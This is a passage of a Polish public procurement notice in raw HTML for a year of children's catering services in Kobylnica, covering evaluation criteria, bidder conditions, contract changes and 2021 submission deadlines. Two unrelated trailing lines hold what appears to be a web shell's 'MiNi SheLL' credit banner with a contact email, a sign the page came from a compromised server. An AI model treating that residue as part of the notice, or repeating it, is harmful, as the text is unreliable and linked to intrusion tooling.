class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający ustalił następujące kryteria oceny ofert:<br/>1)	Cena C – waga kryterium 100%, punktowa – 100 punktów.<br/>Za najkorzystniejszą uznana zostanie oferta, która uzyskała najwyższą ilość punktów w kryterium Cena C.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>zdolności technicznej lub zawodowej (art. 116):<br/>Wykonawca spełni warunek, jeżeli wykaże, że: wykonał, a w przypadku świadczeń powtarzających lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, minimum 1 usługę lub kilka usług żywienia dzieci, ale nie więcej niż 10 usług w zakresie przygotowywania posiłków w ramach żywienia zbiorowego dzieci i młodzieży o łącznej wartości tych usług minimum 400.000,00 zł brutto, w przedszkolach, innych formach wychowania przedszkolnego, szkołach, z wyłączeniem szkół dla dorosłych, a także w placówkach systemu oświaty, o których mowa w art. 2 pkt 1 ustawy z dnia 14 grudnia 2016 r. Prawo oświatowe (t. j. Dz.U. z 2020 poz. 910 ze zm.). <br/>Usługi przygotowywania posiłków wykonywane w ramach jednej umowy traktuje się jak jedną usługę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie składane na podstawie § 10 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów, jakich może zadać zamawiający od wykonawcy, w celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu, zamiast podmiotowych środków dowodowych, o których mowa w § 9 (ust. 1 pkt 2), stanowiące Załącznik nr 4 do SWZ, na potwierdzenie spełnienia warunku wskazanego w Rozdziale VI ust. 2 pkt 4.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do oferty sporządzonej w oparciu o Formularz oferty stanowiący Załącznik nr 1 do SWZ Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1)	oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania, składane na podstawie art. 125 ust. 1 ustawy Pzp – zgodnie z Załącznikiem nr 2 do SWZ;<br/>2)	oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp, o którym mowa w Rozdziale IX ust. 3, zgodnie z Załącznikiem nr 3 do SWZ; <br/>3)	Pełnomocnictwo, jeżeli ofertę podpisuje ustanowiony pełnomocnik lub inny dokument potwierdzający umocowanie do działania w imieniu danego podmiotu; Pełnomocnictwo składa się zgodnie z postanowieniami Rozdziału XI ust. 13-14;<br/>4)	zobowiązanie podmiotu (Wykonawcy) udostępniającego zasoby oraz oświadczenie, <br/>o którym mowa w Rozdziale VIII ust. 7;<br/>5)	dokument wadium – jeśli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do Oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII ust. 1 pkt 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, na podstawie art. 117 ust. 4 ustawy Pzp, dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi Załącznik nr 3 do SWZ . <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień niniejszej umowy jest możliwa w przypadkach opisanych poniżej, z zastrzeżeniem, iż zmiany te nie wykraczają poza zakres przedmiotu zamówienia określonego w Ogłoszeniu oraz w § 1 umowy oraz w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy a Strony umowy wyraziły zgodę na wprowadzenie tych zmian:<br/>1)	konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,<br/>2)	zmiany zakresu lub sposobu świadczenia usługi w związku ze zmianą przepisów prawa mających związek z realizacją przedmiotu umowy, w zakresie niezbędnym do dostosowania umowy do warunków wynikających ze zmiany przepisów prawa,<br/>3)	zlecenie dodatkowych zadań związanych z usługą, służących do usprawnienia procesu żywienia, polepszenia jakości usługi bądź niezbędnych z punktu widzenia bezpieczeństwa osób lub nieprzewidzianych okoliczności, gdyby bez ich realizacji wykonanie umowy było niemożliwe lub utrudnione albo rezygnacja z części zadań przez Zamawiającego np. ze względów organizacyjnych,<br/>4)	zmiany dotyczą terminów płatności i sposobu rozliczenia,<br/>5)	zmiany w trybie art. 455 ustawy Pzp,<br/>6)	zmiany nie są istotne w rozumieniu art. 454 ust. 2 ustawy Pzp,<br/>7)	zmiany dotyczą terminu zakończenia umowy w przypadku:<br/>a)	wystąpienia okoliczności siły wyższej,<br/>b)	wystąpienia obiektywnych przyczyn, których zamawiający działając z należytą starannością nie mógł przewidzieć,<br/>c)	gdy z przyczyn leżących po stronie Zamawiającego, Wykonawca nie ma możliwości wykonania usługi,<br/>d)	niewykorzystania kwoty umowy brutto, o której mowa w §4 ust. 1.<br/>Zamawiający dopuszcza możliwość zmiany wysokości wynagrodzenia określonego w §4 ust. 1 w przypadku zmiany:<br/>1)	stawki podatku od towarów i usług (VAT) oraz podatku akcyzowego,<br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych –<br/>jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem : https://platformazakupowa.pl/pn/cuwkobylnica w myśl ustawy Pzp na stronie internetowej prowadzonego postępowania tj. Centrum Usług Wspólnych w Kobylnicy, ul. Wodna 20/2.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-01 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-30</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com